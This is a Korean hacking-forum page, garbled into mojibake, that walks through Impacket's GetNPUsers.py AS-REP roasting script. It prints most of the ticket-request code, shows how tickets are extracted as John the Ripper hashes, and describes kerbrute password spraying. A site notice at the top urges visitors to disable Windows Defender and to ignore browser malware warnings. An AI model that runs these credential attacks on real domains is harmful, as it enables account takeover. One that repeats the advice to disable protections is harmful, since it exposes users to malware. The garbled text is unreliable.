ÇØÄ¿Áî´º½º / ÇØÄ¿´ëÇÐ

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡
¡¡

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡

°øÁö

¡¡

1. MS ¿§Áö ºê¶ó¿ìÀú¿¡¼­ÀÇ °æ°íâÀº 'À©µµ¿ì µðÆæ´õ'¸¦ ²ô½Ã¸é µË´Ï´Ù.

             'À©µµ¿ì µðÆæ´õ ²ô±â'

2. Å©·Ò ºê¶ó¿ìÀú·Î Á¢¼Ó½Ã ³ª¿À´Â ¾Ç¼ºÄÚµå °æ°íâÀº ±¸±Û Å©·ÒÀÇ ¿¡·¯, Áï ¿ÀŽ(ŽÁö ¿À·ù)À̹ǷΠ¹«½ÃÇÏ½Ã¸é µË´Ï´Ù.

3. ÀÌ »çÀÌÆ®´Â ¾ÈÀüÇÏ¸ç ±ú²ýÇÏ´Ù´Â °ÍÀ» ¾Ë·Á µå¸³´Ï´Ù.

4. ¹«°íÇÑ »çÀÌÆ®µé¿¡ ´ëÇÑ °ø·æ ±â¾÷ ºê¶ó¿ìÀúµéÀÇ ¹«Â÷º°ÀûÀÎ 'ŽÁö ¿À·ù ȾÆ÷'°¡ »ç¿ëÀÚµéÀÇ Á¤º¸ °øÀ¯ÀÇ ÀÚÀ¯¸¦ ħÇØÇÏ°í ÀÖ½À´Ï´Ù. ÀÌ¿¡ ´ëÀÀÇÏ¿© ÀÌ ±â¾÷µéÀ» »ó´ë·Î ¼Ò¼ÛÀ» ÁغñÇÏ°í ÀÖ½À´Ï´Ù.

¡¡





  ÇØÄ¿¸ô  
No, 3976
±¸ºÐ: À¯Æ¿
Á¾·ù: Brutus
ÆÄÀÏÇüÅÂ: ¸µÅ©
¶óÀ̼¾½º: ¿ÀǼҽº
Áö¿øOS: À©µµ/¸®´ª½º
Å©·¢¿©ºÎ: na
2024/3/11(¿ù)
Á¶È¸: 310
GetNPUsers.py µµ±¸ ºÐ¼®  

https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py

 

ÀÌ ÄÚµå´Â Impacket ¶óÀ̺귯¸®¸¦ »ç¿ëÇÏ¿© Active Directory µµ¸ÞÀο¡¼­ "Kerberos »çÀü ÀÎÁõÀÌ ÇÊ¿äÇÏÁö ¾ÊÀ½¼Ó¼ºÀÌ ¼³Á¤µÈ »ç¿ëÀÚ¸¦ ã°íÇØ´ç »ç¿ëÀÚµéÀÇ TGT(Ticket Granting Ticket)¸¦ ¾ò¾î¼­ John The Ripper Çü½ÄÀ¸·Î Ãâ·ÂÇÏ´Â ½ºÅ©¸³Æ®ÀÌ´Ù.

 

-ÄÚµå ºÐ¼®

getMachineName(97-118)

  def getMachineName(self, target):
        try:
            s = SMBConnection(target, target)
            s.login('', '')
        except OSError as e:
            if str(e).find('timed out') > 0:
                raise Exception('The connection is timed out. Probably 445/TCP port is closed. Try to specify '
                                'corresponding NetBIOS name or FQDN as the value of the -dc-host option')
            else:
                raise
        except SessionError as e:
            if str(e).find('STATUS_NOT_SUPPORTED') > 0:
                raise Exception('The SMB request is not supported. Probably NTLM is disabled. Try to specify '
                                'corresponding NetBIOS name or FQDN as the value of the -dc-host option')
            else:
                raise
        except Exception:
            if s.getServerName() == '':
                raise Exception('Error while anonymous logging into %s' % target)
        else:
            s.logoff()
        return s.getServerName()

s = SMBConnection(target, target): SMBConnection °´Ã¼¸¦ »ý¼ºÇÑ´ÙÀÌ °´Ã¼¸¦ »ç¿ëÇÏ¿© ´ë»ó ¼­¹ö¿ÍÀÇ ¿¬°áÀ» ¼³Á¤ÇÏ°í ÀÎÁõÀ» ½ÃµµÇÑ´Ù. targetÀº ¼­¹öÀÇ IP ÁÖ¼Ò ¶Ç´Â È£½ºÆ® À̸§ÀÌ´Ù.

 

s.login('', ''): SMBConnection °´Ã¼¸¦ »ç¿ëÇÏ¿© À͸íÀ¸·Î ·Î±×ÀÎÀ» ½ÃµµÇÑ´ÙÀÌ ¸Þ¼­µå´Â »ç¿ëÀÚ À̸§°ú ºñ¹Ð¹øÈ£¸¦ ÀÎÀÚ·Î ¹Þ´Â´Ù¿©±â¼­´Â ºñ¾îÀÖ´Â ¹®ÀÚ¿­À» »ç¿ëÇÏ¿© À͸íÀ¸·Î ·Î±×ÀÎÇÑ´Ù.

 

s.logoff(): ·Î±×Àο¡ ¼º°øÇÏ°í³ª¸é SMBConnectionÀ» ·Î±×¿ÀÇÁÇÑ´ÙÀÌ´Â ¿¬°áÀ» Á¾·áÇÏ°í ¸®¼Ò½º¸¦ ÇØÁ¦ÇÏ´Â µ¥ »ç¿ëµÈ´Ù.

 

return s.getServerName(): ·Î±×Àο¡ ¼º°øÇÑ °æ¿ì, SMBConnection °´Ã¼ÀÇ getServerName ¸Þ¼­µå¸¦ »ç¿ëÇÏ¿© ¼­¹öÀÇ À̸§À» ¹ÝȯÇÑ´Ù.

 

getTGT(126-

def getTGT(self, userName, requestPAC=True):

        clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

        asReq = AS_REQ()

        domain = self.__domain.upper()
        serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

        pacRequest = KERB_PA_PAC_REQUEST()
        pacRequest['include-pac'] = requestPAC
        encodedPacRequest = encoder.encode(pacRequest)

        asReq['pvno'] = 5
        asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)

        asReq['padata'] = noValue
        asReq['padata'][0] = noValue
        asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        asReq['padata'][0]['padata-value'] = encodedPacRequest

        reqBody = seq_set(asReq, 'req-body')

        opts = list()
        opts.append(constants.KDCOptions.forwardable.value)
        opts.append(constants.KDCOptions.renewable.value)
        opts.append(constants.KDCOptions.proxiable.value)
        reqBody['kdc-options'] = constants.encodeFlags(opts)

        seq_set(reqBody, 'sname', serverName.components_to_asn1)
        seq_set(reqBody, 'cname', clientName.components_to_asn1)

        if domain == '':
            raise Exception('Empty Domain not allowed in Kerberos')

        reqBody['realm'] = domain

        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
        reqBody['till'] = KerberosTime.to_asn1(now)
        reqBody['rtime'] = KerberosTime.to_asn1(now)
        reqBody['nonce'] = random.getrandbits(31)

        supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)

        seq_set_iter(reqBody, 'etype', supportedCiphers)

        message = encoder.encode(asReq)

        try:
            r = sendReceive(message, domain, self.__kdcIP)
        except KerberosError as e:
            if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                # RC4 not available, OK, let's ask for newer types
                supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
                                    int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
                seq_set_iter(reqBody, 'etype', supportedCiphers)
                message = encoder.encode(asReq)
                r = sendReceive(message, domain, self.__kdcIP)
            else:
                raise e

        # This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
        # 'Do not require Kerberos preauthentication' set
        try:
            asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
        except:
            # Most of the times we shouldn't be here, is this a TGT?
            asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
        else:
            # The user doesn't have UF_DONT_REQUIRE_PREAUTH set
            raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)

        # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
        if self.__outputFormat == 'john':
            # Check what type of encryption is used for the enc-part data
            # This will inform how the hash output needs to be formatted
            if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
                return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,
                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode(),
                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode())
            else:
                return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
                                                   hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
                                                   hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())

ÁÖ¾îÁø »ç¿ëÀÚ¿¡ ´ëÇÑ TGT(Ticket Granting Ticket)¸¦ °¡Á®¿À´Â ¸Þ¼­µåÀÌ´ÙÁÖ¿äÇÑ ÀýÂ÷´Â AS ¿äû(AS_REQ)À» »ý¼ºÇÏ°íÇØ´ç ¿äûÀ» ¼­¹ö¿¡ º¸³»´Â °ÍÀÌ´ÙÀÌÈÄ AS ÀÀ´ä(AS_REP)À» ¹Þ¾Æ TGT¸¦ ÃßÃâÇÑ´Ù.

 

clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value): »ç¿ëÀÚ À̸§À» ¹ÙÅÁÀ¸·Î Principal °´Ã¼¸¦ »ý¼ºÇÑ´ÙÀÌ °´Ã¼´Â »ç¿ëÀÚ¸¦ ³ªÅ¸³»´Â ÁÖü(Subject)¸¦ ³ªÅ¸³½´Ù.

 

asReq = AS_REQ(): AS ¿äû °´Ã¼¸¦ »ý¼ºÇÑ´ÙÀÌ °´Ã¼´Â ÀÎÁõ ¼­¹ö¿¡°Ô TGT¸¦ ¿äûÇÏ´Â µ¥ »ç¿ëµÈ´Ù.

 

serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value): ÀÎÁõ ¼­¹öÀÇ Principal °´Ã¼¸¦ »ý¼ºÇÑ´ÙÀ̸¦ ÅëÇØ TGT¸¦ ¿äûÇÑ´Ù.

 

asRep = decoder.decode(r, asn1Spec=AS_REP())[0]: ÀÀ´ä ¸Þ½ÃÁö¸¦ Çص¶ÇÑ´ÙÀ̶§¿¹¿Ü°¡ ¹ß»ýÇϸé AS_REP ¸Þ½ÃÁö·Î °£ÁֵȴÙ.

 

if self.__outputFormat == 'john':: Ãâ·Â Çü½ÄÀÌ 'john'ÀÎ °æ¿ì¸¦ È®ÀÎÇÑ´Ù.

 

return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,: TGT¸¦ John Æ÷¸ËÀ¸·Î ¹ÝȯÇÑ´Ù.

 

outputTGT(225-

  def outputTGT(entry, fd=None):
        print(entry)
        if fd is not None:
            fd.write(entry + '\n')

°¡Á®¿Â TGT¸¦ Ãâ·ÂÇÑ´Ù.

 

entry: Ãâ·ÂÇÒ TGTÀÌ´Ù.

fd°¡ NoneÀÌ ¾Æ´Ñ °æ¿ì ÆÄÀÏ¿¡ TGT¸¦ ¾´´Ù.

 

 

-»ç¿ëÇÑ µµ±¸ ÀÌÇØ

kerbrute

Kerbrute´Â Kerberos »çÀü ÀÎÁõÀ» ÅëÇØ À¯È¿ÇÑ Active Directory °èÁ¤À» ½Å¼ÓÇÏ°Ô ¹«Â÷º° ´ëÀÔÇÏ°í ¿­°ÅÇÏ´Â µ¥ µµ¿òÀÌ µÇµµ·Ï ¼³°èµÈ µµ±¸ÀÌ´Ù.

ÀÌ µµ±¸´Â µÎ °¡Áö ÁÖ¿ä °ø°Ý ¹æ¹ý¿¡ ÁßÁ¡À» µÐ´Ù.

 

1.Password Spraying (ºñ¹Ð¹øÈ£ ½ºÇÁ·¹ÀÌ): ÀÌ °ø°Ý ±â¹ýÀº ´ÜÀÏ ºñ¹Ð¹øÈ£¸¦ ¿©·¯ »ç¿ëÀÚ¸í¿¡ ½ÃµµÇÏ´Â °ÍÀÌ´ÙÀÌ´Â °èÁ¤ Àá±ÝÀ» ÇÇÇϱâ À§ÇØ °ø°ÝÀ» ´õ ±ä ±â°£ µ¿¾È ºÐ»ê½ÃÅ°´Â µ¥ »ç¿ëµÈ´ÙÇØÄ¿´Â Kerbrute¸¦ »ç¿ëÇÏ¿© Kerberos µ¥ÀÌÅͺ£À̽º ³»¿¡ ¾àÇÑ ºñ¹Ð¹øÈ£³ª ÀϹÝÀûÀ¸·Î »ç¿ëµÇ´Â ºñ¹Ð¹øÈ£°¡ ÀÖ´ÂÁö Å×½ºÆ®ÇÑ´Ù.

 

2.Brute Force Attacks (¹«Â÷º° ´ëÀÔ °ø°Ý): ¹«Â÷º° ´ëÀÔ °ø°ÝÀº »ç¿ëÀÚ¸í°ú ºñ¹Ð¹øÈ£ÀÇ ¸ðµç °¡´ÉÇÑ Á¶ÇÕÀ» ü°èÀûÀ¸·Î ½ÃµµÇÏ´Â °ÍÀÌ´Ù. Kerbrute´Â »çÀü °ø°ÝÀ» ¼öÇàÇϰųª ºñ¹Ð¹øÈ£ Á¶ÇÕÀ» »ý¼ºÇÏ¿© ÀÚ°Ý Áõ¸íÀ» ¹ß°ßÇÑ´Ù.

 

john

"john"Àº John the RipperÀÇ ÁÙÀÓ¸»·Î°­·ÂÇÑ ¾ÏÈ£ Çص¶ ¹× Çؽà ũ·¡Å· µµ±¸ÀÌ´Ù.

Æнº¿öµåÀÇ °­µµ¸¦ Æò°¡ÇÏ°íÃë¾àÁ¡À» ½Äº°Çϸ纸¾È Á¤Ã¥À» °³¼±ÇÏ´Â µ¥ »ç¿ëµÇ´Â À¯¿ëÇÏ´Ù±×·¯³ª »ç¿ë ½Ã¿¡´Â ¹ýÀûÀÎ Á¦¾à »çÇ×°ú À±¸®ÀûÀÎ °í·Á »çÇ×À» ¿°µÎ¿¡ µÎ¾î¾ß ÇÑ´Ù.


                   
¹øÈ£±¸ºÐÁ¦ ¸ñÀ帣
3979 Á¤º¸    AD ÇØÅ· ±â¹ý Á¾·ù ±âŸ  
3978 Á¤º¸    SQLi Ä¡Æ®½ÃÆ® SQLi 
3977 À¯Æ¿    ¹ö±× ¹Ù¿îƼ µµ±¸ ¸®½ºÆ® Bug bounty 
3976 À¯Æ¿    GetNPUsers.py µµ±¸ ºÐ¼® Brutus 
3975 À¯Æ¿    ÀÚµ¿ ¸ðÀÇ Ä§Åõ Å×½ºÆ® Ç÷§Æû 0 Pentera ¸ðÀÇħÅõ 
3974 Á¤º¸    DDoS °ø°Ý ´çÇÏ´ÂÁö üũÇØ ÁÖ´Â ¼­ºñ½º DDoS 
3973 Á¤º¸    ¾Ç¼ºÄÚµå »ùÇà Á¦°ø »çÀÌÆ® ¾Ç¼ºÄÚµå 
3972 Á¤º¸    2023³âµµ ±¹³» ¼­¹öµéÀ» °ø°ÝÇÏ´Â ÃֽŠRAT RAT 
3971 Á¤º¸    'DNS water-torture' °ø°Ý°ú ´ëÀÀÃ¥ DDoS 
3970 À¯Æ¿    The macOS and Linux Disassembler µð½º¾î¼Àºí·¯ 
3969 ¹®¼­    IDOR (Insecure Direct Object Reference) ±âŸ  

 
óÀ½ ÀÌÀü ´ÙÀ½       ¸ñ·Ï